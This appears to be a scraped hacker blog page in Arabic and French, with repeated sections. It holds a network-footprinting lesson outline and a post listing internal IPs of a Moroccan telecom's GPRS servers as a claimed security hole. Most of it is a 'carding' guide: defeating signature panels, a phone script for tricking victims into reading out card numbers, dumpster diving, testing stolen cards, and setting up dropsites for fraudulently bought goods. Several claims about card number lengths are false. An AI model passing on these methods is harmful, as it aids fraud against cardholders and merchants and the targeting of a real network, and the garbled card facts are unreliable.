4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف
5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه
6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)
7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب
8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها
==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها
ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا
الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز
2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000
3 - معرفه نوع نظام التشغيل
أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل
4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف
5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه
6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)
7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب
8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها
==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها
ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا
الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman
better than ever
un site pour les hackeurs professionnelles pour leurs rechers
http://www.google.com/intl/xx-hacker
http://www.google.com/intl/xx-hacker
NEWS SUR MAROC TLECOME GPRS CONNECTION
EXCLUSIVE
projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles
hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :
point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :
A1 192.168.171.131 ((((ip racine )))
A2 192.168.173.36
A3 192.168.240.2
A4 192.168.241.20
A5 10.16.35.50
point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :
B1 192.168.171.131 ((((ip racine )))
B2 192.168.173.36
B3 192.168.240.2
si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman
projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles
hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :
point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :
A1 192.168.171.131 ((((ip racine )))
A2 192.168.173.36
A3 192.168.240.2
A4 192.168.241.20
A5 10.16.35.50
point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :
B1 192.168.171.131 ((((ip racine )))
B2 192.168.173.36
B3 192.168.240.2
si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman
الأربعاء، 11 يونيو 2008
carding
الجزء الاول:
هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده
أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...
ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض
---------------------
هذا هو كيفيه تصنيفهم
---------------------
\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1
\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\
American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!
الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)
ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!
كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر
النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك
---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)
TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---
المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express
/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard
/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa
/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo
/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا
لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman
هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده
أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...
ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض
---------------------
هذا هو كيفيه تصنيفهم
---------------------
\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1
\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\
American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!
الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)
ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!
كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر
النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك
---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)
TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---
المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express
/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard
/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa
/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo
/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
